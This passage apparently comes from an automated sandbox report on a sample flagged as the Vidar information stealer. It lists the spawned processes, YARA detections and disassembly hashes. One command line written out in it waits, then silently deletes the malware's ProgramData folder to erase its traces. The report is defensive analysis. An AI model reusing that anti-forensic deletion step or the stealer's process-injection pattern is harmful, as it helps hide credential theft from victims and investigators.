                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:4
                                                                                                                Start time:22:59:14
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                Imagebase:0xbb0000
                                                                                                                File size:42'064 bytes
                                                                                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:7
                                                                                                                Start time:23:00:13
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\cmd.exe"
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:8
                                                                                                                Start time:23:00:13
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:9
                                                                                                                Start time:23:00:13
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\cmd.exe"
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:10
                                                                                                                Start time:23:00:13
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\cmd.exe"
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:11
                                                                                                                Start time:23:00:13
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:12
                                                                                                                Start time:23:00:13
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\cmd.exe"
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:13
                                                                                                                Start time:23:00:13
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:14
                                                                                                                Start time:23:00:17
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:15
                                                                                                                Start time:23:00:17
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:16
                                                                                                                Start time:23:00:17
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:timeout /t 10
                                                                                                                Imagebase:0x8b0000
                                                                                                                File size:25'088 bytes
                                                                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FFD9B7F1869 Relevance: 3.3, Instructions: 3338COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c2f7e01ce6cb820d89a446df3c8c8dd0968fd22b8e7dda57dc81c81f56269c83
                                                                                                                  • Instruction ID: 3c995031e2f0cc7013445efb21b7673ed1de9dd04b019b1ca7f479c1f88dacc1
                                                                                                                  • Opcode Fuzzy Hash: c2f7e01ce6cb820d89a446df3c8c8dd0968fd22b8e7dda57dc81c81f56269c83
                                                                                                                  • Instruction Fuzzy Hash: C8436B30719A498FD798EF68C495B65B7E2FF98300F5146B9E05EC72A6CE34E941CB80
                                                                                                                  Function 00007FFD9B7F9E75 Relevance: .6, Instructions: 623COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7c7dd63fe453576887f8fa379c154e83b44cb8ef8cdf609430e5cfb2671f886c
                                                                                                                  • Instruction ID: 0a9da11e7ebdb28441d3f2f2c1c90e0d98d6ee01486ab3d137473435fae59da4
                                                                                                                  • Opcode Fuzzy Hash: 7c7dd63fe453576887f8fa379c154e83b44cb8ef8cdf609430e5cfb2671f886c
                                                                                                                  • Instruction Fuzzy Hash: 5B427370A14A1E8FDB55EF14C450BA5F7B2FF99300F5186E5D41ADB2A9DA34AAC0CF80
                                                                                                                  Function 00007FFD9B7F6129 Relevance: .3, Instructions: 347COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 908bb31166251f85da5e55b3e84819b99eafeb32eee59947ba577e3b0ad19b11
                                                                                                                  • Instruction ID: 706e6b57b52c3d858316e9ebe219cde031d5b77ab2f8503a779416fbb01bc78c
                                                                                                                  • Opcode Fuzzy Hash: 908bb31166251f85da5e55b3e84819b99eafeb32eee59947ba577e3b0ad19b11
                                                                                                                  • Instruction Fuzzy Hash: D2A13736B09A4A4FCB10FFACE8959ED7BA0EF95326F144277C448CB192CE24A546C7D1
                                                                                                                  Function 00007FFD9B7F5F25 Relevance: .2, Instructions: 228COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 84ae7fd861a4f98378e76aaf32d723d8296ea71f64afbc118576c9c9dd1c48dd
                                                                                                                  • Instruction ID: d16567c1d12247436531677174b3854303fdfba7ce08a3e342088de08c949f0f
                                                                                                                  • Opcode Fuzzy Hash: 84ae7fd861a4f98378e76aaf32d723d8296ea71f64afbc118576c9c9dd1c48dd
                                                                                                                  • Instruction Fuzzy Hash: 4D611371B09B8E4FDB51DB6CD8A9AE97BF0EF59300B0501FBE448C71A2DA24A845C791
                                                                                                                  Function 00007FFD9B7F5C00 Relevance: .2, Instructions: 167COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 40e37bb8842d9353ca04efc12b34772ba5ea7becf141d1627331f739f86ec7be
                                                                                                                  • Instruction ID: 6a672d4aada93239731616e85e8b7b3d317fe098947809c068db30f95d6d9c85
                                                                                                                  • Opcode Fuzzy Hash: 40e37bb8842d9353ca04efc12b34772ba5ea7becf141d1627331f739f86ec7be
                                                                                                                  • Instruction Fuzzy Hash: CD51D670E19A5D8FDF98EF98C864AECBBB1FF58304F100169D00AE72A5DB756941CB44
                                                                                                                  Function 00007FFD9B7F1075 Relevance: .1, Instructions: 135COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 319ae936d68984efa9e049aed60abc067e6e8d1b3733385f6db62987cb63e3ef
                                                                                                                  • Instruction ID: a80c2bad69fc5869f3cfcd11b9b412b0a22abf3752a28b05cf11dfc702833a1a
                                                                                                                  • Opcode Fuzzy Hash: 319ae936d68984efa9e049aed60abc067e6e8d1b3733385f6db62987cb63e3ef
                                                                                                                  • Instruction Fuzzy Hash: B5413A92F0EACA1BF7A952B804761A97B81EFA1350F0A02B6D019C75B7ED1979054284
                                                                                                                  Function 00007FFD9B7F9769 Relevance: .1, Instructions: 117COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8032c113c536125475f13d526d8c41c77fbb3002f5ef36b391b294b942e65881
                                                                                                                  • Instruction ID: fa5035c42d9349da97ea52bc70564754571b85ba3241f694c8898dae73b05550
                                                                                                                  • Opcode Fuzzy Hash: 8032c113c536125475f13d526d8c41c77fbb3002f5ef36b391b294b942e65881
                                                                                                                  • Instruction Fuzzy Hash: 1641B371E0978D4FEB59EF1888696E9BBA0EF55300F4502BAD01CD72E2DE2868448791
                                                                                                                  Function 00007FFD9B7F10F5 Relevance: .1, Instructions: 110COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8f7dfb9314d3a5a09447965fcf2f093c007a0edb8b6963f0b10eed316463aa6b
                                                                                                                  • Instruction ID: 0165f9ef9bfa39aeebbfe73f0c13956caccfdbfb58d7d7801a2a3fbaf5baf0ac
                                                                                                                  • Opcode Fuzzy Hash: 8f7dfb9314d3a5a09447965fcf2f093c007a0edb8b6963f0b10eed316463aa6b
                                                                                                                  • Instruction Fuzzy Hash: AE310AA2B0FBCA1FF3A5567804791A87B81EFA1250F0A02BBD059C75F3ED196C058384
                                                                                                                  Function 00007FFD9B7F671D Relevance: .1, Instructions: 104COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 11a903df78e7818ab2d1a8b28962244552ea0320fbfb7319e2d2ac1aabd07705
                                                                                                                  • Instruction ID: 6a45029428f9dc4faec771f961bdbef539a7b835d234f93cd3cc7483fc648512
                                                                                                                  • Opcode Fuzzy Hash: 11a903df78e7818ab2d1a8b28962244552ea0320fbfb7319e2d2ac1aabd07705
                                                                                                                  • Instruction Fuzzy Hash: 68213B31718E8E0FEB64DB2C9864A657BE1EFA924070502BBD449C72B9DE25EC02C381
                                                                                                                  Function 00007FFD9B7F60BF Relevance: .1, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 811c85e5e9dc740a034aa74a2745c0c6c6a5da6e6ca09229809b4f4d68a22487
                                                                                                                  • Instruction ID: 5bd54cd9002dc30a5afab47bafb32515e6add326f19f4a2fb5fdd056cecfe707
                                                                                                                  • Opcode Fuzzy Hash: 811c85e5e9dc740a034aa74a2745c0c6c6a5da6e6ca09229809b4f4d68a22487
                                                                                                                  • Instruction Fuzzy Hash: 32310771E15A1D8FDB50EF98D894AEDBBF0FB59301F010666E409E32A4DB34A980CB91
                                                                                                                  Function 00007FFD9B7F8405 Relevance: .1, Instructions: 70COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8033082f58186de07f83c8d239f63777ea7c16724a4b120dc72cab714cdd17ab
                                                                                                                  • Instruction ID: 7fcc894e7d42cda597ec616420564da1c2f53e3f53a469273e65c9977439e9d7
                                                                                                                  • Opcode Fuzzy Hash: 8033082f58186de07f83c8d239f63777ea7c16724a4b120dc72cab714cdd17ab
                                                                                                                  • Instruction Fuzzy Hash: 6A217971E0960DCFDB51EB80D4A56FDBBB1FF55304F010229C109A71A1CB38A644CB85
                                                                                                                  Function 00007FFD9B7F083B Relevance: .1, Instructions: 62COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cfbd656c5331e1c29535b2c88c4a295121db0435e5292100d351f0d7806d4482
                                                                                                                  • Instruction ID: ae21fc2e3b8e4457abe65513bcf490a59cb4f3c229f7c0246e9419c746681bb7
                                                                                                                  • Opcode Fuzzy Hash: cfbd656c5331e1c29535b2c88c4a295121db0435e5292100d351f0d7806d4482
                                                                                                                  • Instruction Fuzzy Hash: D711E312F0EB8A8FF37527B8047A0F87F91EF22610B1A01BAC459861F3ED09691583C9
                                                                                                                  Function 00007FFD9B7F5C39 Relevance: .0, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9974be04ad298efb4e6b0b6a917b01af122352f36017859959eb9dbfa60ad12a
                                                                                                                  • Instruction ID: 14fc9c3a10696baf45a0d6472871f5ee31a48ec5a5cca79daff8876e8e80ee18
                                                                                                                  • Opcode Fuzzy Hash: 9974be04ad298efb4e6b0b6a917b01af122352f36017859959eb9dbfa60ad12a
                                                                                                                  • Instruction Fuzzy Hash: B701491174BA4E0FDB94D76D9CE46243BC1DF59251B8A01B6E949C72B1ED44DD80C3C5
                                                                                                                  Function 00007FFD9B7F3B70 Relevance: .0, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9da04c6c13d39f1505e3e80d9b38d2950950f82a114822a559ada563b0a44346
                                                                                                                  • Instruction ID: 505ad4ae76ee2cabcff83d8a8e43d5ac9fcd6568f3e363edee6a200cd33327fb
                                                                                                                  • Opcode Fuzzy Hash: 9da04c6c13d39f1505e3e80d9b38d2950950f82a114822a559ada563b0a44346
                                                                                                                  • Instruction Fuzzy Hash: D2F02D21B45C2D0FD790E61CA4E8B7537E1FBE8751B4502B5E90DC3265CD14AC4287C0
                                                                                                                  Function 00007FFD9B7F3AE3 Relevance: .0, Instructions: 46COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 616336e74c180e28c00055e64129956f6213700d8fd72716b70b70d52b8dccc9
                                                                                                                  • Instruction ID: d086edf3df04e018365b57af79aa703013f14f3aadb140b1563c55416065bce0
                                                                                                                  • Opcode Fuzzy Hash: 616336e74c180e28c00055e64129956f6213700d8fd72716b70b70d52b8dccc9
                                                                                                                  • Instruction Fuzzy Hash: 4BF0FC7151E7954FCB56DB78C8AAD907FB0EF1620434901D9D284CB273D629E906CB81
                                                                                                                  Function 00007FFD9B7F5D4D Relevance: .0, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6e6acc3ed9c6fed6d18a6af745db95960f24466f5ac18e2a8df76a83d31b3e80
                                                                                                                  • Instruction ID: f9cc701259f06fe2deeaa3728dea54dc30ffaf2e4d97d9dd555f2fa48e1a6c73
                                                                                                                  • Opcode Fuzzy Hash: 6e6acc3ed9c6fed6d18a6af745db95960f24466f5ac18e2a8df76a83d31b3e80
                                                                                                                  • Instruction Fuzzy Hash: ABF02872B0FB9A0FDB52936DC8A89643FD0EF2221078A01F6C585CB1B3D919DD41C385
                                                                                                                  Function 00007FFD9B7F5DAD Relevance: .0, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a7d875f2c62c3939e210bc83e862b1869999fc29de023527c9a6728fb3472173
                                                                                                                  • Instruction ID: c8eee0c8023e75c94375803275e2b30665e654e57f90fb3b689c26ed2afdedd9
                                                                                                                  • Opcode Fuzzy Hash: a7d875f2c62c3939e210bc83e862b1869999fc29de023527c9a6728fb3472173
                                                                                                                  • Instruction Fuzzy Hash: 1CF02B2070EA4A0FCB42EB6D88E89203BE1EF6520074902F6D448CB2B2DD18DC45C3C1
                                                                                                                  Function 00007FFD9B7F5CED Relevance: .0, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4c16c8f50bd8c5636a9ce8dd3d84f0be08d30d096e61b899dbe2a41037d4d21e
                                                                                                                  • Instruction ID: 765e7dd4699bd5a9510eaaa0d24b8b281707e01a07c7439aaf303f8a4c81aa48
                                                                                                                  • Opcode Fuzzy Hash: 4c16c8f50bd8c5636a9ce8dd3d84f0be08d30d096e61b899dbe2a41037d4d21e
                                                                                                                  • Instruction Fuzzy Hash: 1DF0C220B4EA8A0FCB82E76D88E4A203FE1EF6524178A01F6D448CB2B3D918DC45C791
                                                                                                                  Function 00007FFD9B7F5C8D Relevance: .0, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b3d8250c7b33cdcb25f13c597c602c59d5a3f9a3e72cad5549b64dd8f5890c55
                                                                                                                  • Instruction ID: 0c3cf2be446737987fb2af20296756751b987fe84cf291f09d6f3d0e43c58173
                                                                                                                  • Opcode Fuzzy Hash: b3d8250c7b33cdcb25f13c597c602c59d5a3f9a3e72cad5549b64dd8f5890c55
                                                                                                                  • Instruction Fuzzy Hash: B0F0F620B0EA8A0FDB42E76C88B49243BE0EF6520174A01F7D849CB1B2D918DC85C3D2
                                                                                                                  Function 00007FFD9B7F5E0D Relevance: .0, Instructions: 39COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b95a17836f64b0ebbea9cac61146daa0c6ec707462b7b408118fb216d8f7c432
                                                                                                                  • Instruction ID: 5f60c60c9d416247dfacbe323466e91e830d6f85e8c636d848839ef329ad7db8
                                                                                                                  • Opcode Fuzzy Hash: b95a17836f64b0ebbea9cac61146daa0c6ec707462b7b408118fb216d8f7c432
                                                                                                                  • Instruction Fuzzy Hash: CFF0966074EA9A4FDB92D76D88E49203FE1EF6920078A01F6D548CB2B3D918DC85C791
                                                                                                                  Function 00007FFD9B7F5E78 Relevance: .0, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
